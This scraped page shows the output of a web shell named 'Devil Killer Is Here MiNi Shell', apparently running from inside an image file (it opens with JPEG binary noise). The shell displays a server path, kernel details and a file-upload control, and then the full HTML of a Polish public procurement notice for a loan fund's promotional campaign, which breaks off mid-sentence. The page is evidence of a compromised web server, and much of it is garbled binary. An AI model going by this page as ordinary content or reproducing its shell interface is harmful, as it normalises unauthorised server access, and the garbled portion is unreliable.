JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240618/0037183501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Przygotowanie i przeprowadzenie kampanii promocyjnej wraz z zaprojektowaniem logotypów oraz identyfikacji wizualnej na potrzeby Kujawsko-Pomorskiego Funduszu Pożyczkowego Sp. z o.o.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KUJAWSKO-POMORSKI FUNDUSZ POŻYCZKOWY SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">K-PFP Sp. z o.o</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871723445</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Henryka Sienkiewicza 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">564756290</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@kpfp.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://kpfp.org.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Celem działalności Spółki jest wspieranie powstawania i rozwoju przedsiębiorczości oraz rozwoju ekonomii społecznej na terenie województwa kujawsko-pomorskiego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Przygotowanie i przeprowadzenie kampanii promocyjnej wraz z zaprojektowaniem logotypów oraz identyfikacji wizualnej na potrzeby Kujawsko-Pomorskiego Funduszu Pożyczkowego Sp. z o.o.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-038456ef-2d46-11ef-86d2-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00371835</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00237730/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Kampania reklamowa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kpfp <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kpfp</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>https://platformazakupowa.pl/pn/kpfp.<br/>Wymagania techniczne i organizacyjne wysyłania oraz odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie.<br/>korzystania z Platformy (adres: https://platformazakupowa.pl/pn/kpfp).<br/>Składając ofertę Wykonawca akceptuje Regulamin platformazakupowa.pl dla Użytkowników (Wykonawców).<br/>Minimalne wymagania techniczne umożliwiające korzystanie ze strony www.platformazakupowa.pl to: przeglądarka internetowa<br/>Internet Explorer, Chrome i FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka JavaScript, akceptującą pliki typu<br/>„cookies” oraz łącze internetowe o przepustowości, co najmniej 256 kbit/s. www.platformazakupowa.pl jest zoptymalizowana dla<br/>minimalnej rozdzielczości ekranu 1024x768 pikseli.<br/>W przypadku pytań dotyczących funkcjonowania i obsługi technicznej Platformy, prosimy o skorzystanie z pomocy Centrum<br/>Wsparcia Klienta, które udziela wszelkich informacji związanych z procesem składania ofert, rejestracji czy innych aspektów<br/>technicznych platformy, dostępne codziennie od poniedziałku do piątku w godz. od 7.00 do 17.00 pod nr tel. 22 101-02-02.<br/>W sytuacjach awaryjnych np. w przypadku przerwy w funkcjonowaniu lub awarii niedziałania: https://platformazakupowa.pl/pn/kpfp.<br/>komunikacja następuje za pośrednictwem maila na adres: biuro@kpfp.org.pl.<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. poz. 2452).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/kpfp</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych jest Kujawsko-Pomorski Fundusz<br/>Pożyczkowy Sp. z o.o. z siedzibą w Toruniu (87 - 100) przy ul. Sienkiewicza 38. Z Administratorem można się skontaktować poprzez<br/>adres e-mail: daneosobowe@kpfp.org.pl<br/>2. Dane kontaktowe Inspektora Ochrony Danych: Andrzej Narolewski, adres e-mail: daneosobowe@kpfp.org.pl<br/>3. Dane osobowe przekazane przez Wykonawcę przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego na podstawie zgody wyrażonej poprzez akt uczestnictwa w postępowaniu oraz:<br/>a) art. 6 ust. 1 lit. c RODO, gdyż jest to niezbędne do wypełnienia obowiązku prawnego ciążącego na Zamawiającym, wynikającego<br/>min. z przepisów ustawy Prawo zamówień publicznych (Pzp) oraz aktów wykonawczych, a także ustawy o narodowym zasobie<br/>archiwalnym i archiwach; a w przypadku podpisania umowy lub zlecenia wykonania zamówienia, również na podstawie ordynacji<br/>podatkowej oraz przepisów rachunkowo – księgowych, oraz:<br/>b) art. 6 ust. 1 lit. b RODO, gdyż jest to niezbędne do podjęcia działań przed zawarciem umowy oraz do wykonania umowy;<br/>c) art. 6 ust. 1 lit. f RODO, ze względu na uzasadnione interesy Zamawiającego, w szczególności w celu ustalenia, obrony oraz<br/>dochodzenia roszczeń.<br/>4. Przetwarzaniu podlegają:<br/>a) dane kontaktowe oraz inne niezbędne do udziału w postępowaniu oraz podpisania i realizacji umowy;<br/>b) dane zawarte w dokumentach potwierdzających uprawnienia lub doświadczenie.<br/>5. Dane pozyskane mogą zostać bezpośrednio od Wykonawcy, jak i ze źródeł publicznie dostępnych, tj. KRS, CEiDG, strony<br/>internetowe, itp.<br/>6. Państwa dane osobowe mogą być przekazywane wyłącznie podmiotom upoważnionym na podstawie przepisów prawa lub<br/>podmiotom przetwarzającym dane na zlecenie Zamawiającego na podstawie zawartych umów.<br/>7. Państwa dane osobowe będą przechowywane w oparciu o zasady obowiązujące Zamawiającego wynikające z przepisów prawa,<br/>nie dłużej niż jest to niezbędne w ww. celach.<br/>8. Posiadają Państwo prawo do:<br/>a) informacji w zakresie operacji przetwarzania danych osobowych oraz dostępu do nich;<br/>b) sprostowania (poprawienia) danych, usunięcia, ograniczenia przetwarzania;<br/>c) przeniesienia danych;<br/>d) złożenia sprzeciwu oraz cofnięcia zgody, o ile mają zastosowanie, na zasadach określonych w RODO – wystarczy zgłosić się do<br/>daneosobowe@kpfp.org.pl,<br/>e) złożenia skargi do organu nadzorczego: Prezes Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00- 193 Warszawa;<br/>f) skorzystania ze środków ochrony prawnej przed właściwym sądem.<br/>9. Obowiązek podania przez Państwa danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego lub realizacją umowy. Konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp.<br/>10. W przypadku postępowań o udzielenie zamówienia wyłączonych spod stosowania przepisów ustawy Pzp, podanie danych jest<br/>dobrowolne, jednakże ich brak uniemożliwi udział w postępowaniu.<br/>11. Na podstawie tak zebranych danych nie będą podejmowane zautomatyzowane decyzje.<br/>12. Państwa dane nie będą podlegały profilowaniu, tj. nie będą podlegały automatycznemu przypisywaniu lub przewidywaniu<br/>Państwa zachowań, preferencji, postaw, potrzeb czy sposobu życia.<br/>13. Państwa dane osobowe nie będą przekazywane podmiotom z siedzibą poza Europejskim Obszarem Gospodarczym, tj. do<br/>państw trzecich lub organizacji międzynarodowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Obowiązek podania przez Państwa danych osobowych jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego lub realizacją<br/>umowy.<br/>Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>W przypadku postępowań o udzielenie zamówienia wyłączonych spod stosowania przepisów ustawy Pzp, podanie danych jest<br/>dobrowolne, jednakże ich brak uniemożliwi udział w postępowaniu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOA.382.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja usługi obejmująca kompleksowe przygotowanie i przeprowadzenie kampanii<br/>informacyjno-promocyjnej, skierowanej do odbiorców wsparcia, której zadaniem jest promocja działań wdrażanych przez<br/>Kujawsko-Pomorski Fundusz Pożyczkowy Sp. z o. o. w ramach realizowanych projektów objętych dofinansowaniem z<br/>budżetu UE w ramach programu Fundusze Europejskie dla Kujaw i Pomorza 2021 -2027. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79341400-0 - Usługi prowadzenia kampanii reklamowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79342200-5 - Usługi w zakresie promocji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający<br/>przewiduje udzielenie, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, wykonawcy któremu zostanie udzielone<br/>zamówienie, zamówień polegających na powtórzeniu podobnych usług, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>2. Łączna wartość zamówień udzielanych na podstawie art. 214 ust. 1 pkt 7 nie przekroczy 50 % wartości zamówienia<br/>podstawowego.<br/>3. Zakres zamówień podobnych może obejmować świadczenie usług objętych zakresem podstawowym zamówienia na wyznaczony<br/>przez Zamawiającego okres świadczenia usługi, objętej zamówieniem na usługi podobne. Zakres zleconych usług nie przekroczy<br/>wartości, o której mowa w ust. 2.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>cena ( C ) - 60%<br/>2. Sposób oceny ofert: Zamawiający dokona oceny ofert na podstawie wyniku osiągniętej liczby punktów przyznanych przez komisję<br/>przetargową w oparciu o powyższe kryteria i ustaloną punktację do 100 (100 % = 100 pkt). Punkty za poszczególne kryteria zostaną<br/>zsumowane i będą stanowić końcową ocenę oferty.<br/>Łączna ilość punktów jaką uzyska dana oferta ustalona zostanie wg poniższego wzoru: Pi= Pi (C)+ Pi(K)+ Pi(P)<br/>3. Punkty w zakresie kryterium: cena ( C ) zostaną przyznane zgodnie z poniższym wzorem:<br/>Ocenie zostanie poddana cena oferty, czyli cena brutto za realizację całego zamówienia, obliczona przez Wykonawcę zgodnie z<br/>przepisami prawa oraz sposobem obliczania ceny oferty określonym w SWZ, podana w „Formularzu oferty”.<br/>Punktacja w tym kryterium zostanie przyznana wg następującego wzoru:<br/>C=Cm/Cx⋅60 pkt<br/>Gdzie:<br/>Cx – cena brutto oferty badanej<br/>Cm – najniższa zaproponowana cena brutto<br/>koncepcja kampanii (K) -25%<br/>portfolio (P) - 15%<br/>4.3.2.) Sposób określania</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koncepcja kampanii (strategiczna i kreatywna)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Portfolio</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca w celu wykazania braku podstaw do wykluczenia, o których mowa w Rozdziale VII oraz na potwierdzenie<br/>spełniania warunków udziału w postępowaniu, o których mowa w Rozdziale VIII zobowiązany będzie złożyć oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu na wzorze, stanowiącym załącznik nr 3 do SWZ -<br/>dokument składany wraz z ofertą.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące<br/>zdolności technicznej lub zawodowej (art. 112 ust. 2 pkt 4 ustawy Pzp).<br/>2. W zakresie warunku dotyczącego zdolności technicznej lub zawodowej Zamawiający uzna warunek za spełniony, jeżeli<br/>Wykonawca:<br/>a) wykaże że w okresie ostatnich 3 (trzech) lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub o charakterze<br/>ciągłym również wykonuje należycie co najmniej dwie kampanie medialne i/lub promocyjne o wartości nie mniejszej niż 100<br/>000,00 zł brutto każda z wykazywanych kampanii,<br/>b) dysponuje minimum jedną osobą zarządzającą projektem, która będzie uczestniczyć w wykonywaniu zamówienia, która<br/>posiada następujące doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert zarządzała minimum dwoma projektami o charakterze promocyjnym i/lub medialnym (kampania promocyjna i/lub medialna) o wartości nie<br/>mniejszej niż 100 000,00 zł brutto każdy projekt.<br/>3. W pozostałym zakresie Zamawiający nie ustanawia minimalnych poziomów zdolności. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający, w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia następujących podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>2.1 zamiast podmiotowych środków dowodowych, o których mowa w § 2 ust. 1 pkt 1, 2 lub 4-6 Rozporządzenia w sprawie podmiotowych środków dowodowych, żąda oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, tj. oświadczenie winno odnosić się do podstaw wykluczenia, o których mowa w: <br/>art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych, zwanej dalej &#34;ustawą&#34;,<br/>art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego<br/>art. 108 ust. 1 pkt 5 ustawy - oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/>2.2. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 Pzp, art. 108 ust. 1 pkt 4 Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, art. 108 ust. 1 pkt 5 Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6 Pzp, tj. informacje zawarte w oświadczeniu winny potwierdzać brak podstaw do wykluczenia, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>2.3. oświadczenia Wykonawcy w zakresie braku podstaw do wykluczenia, o których mowa w art. 5k Rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. U. UE. L. z 2014 r. Nr 229, str. 1 z późn. zm.), art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835 ze zm.).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania 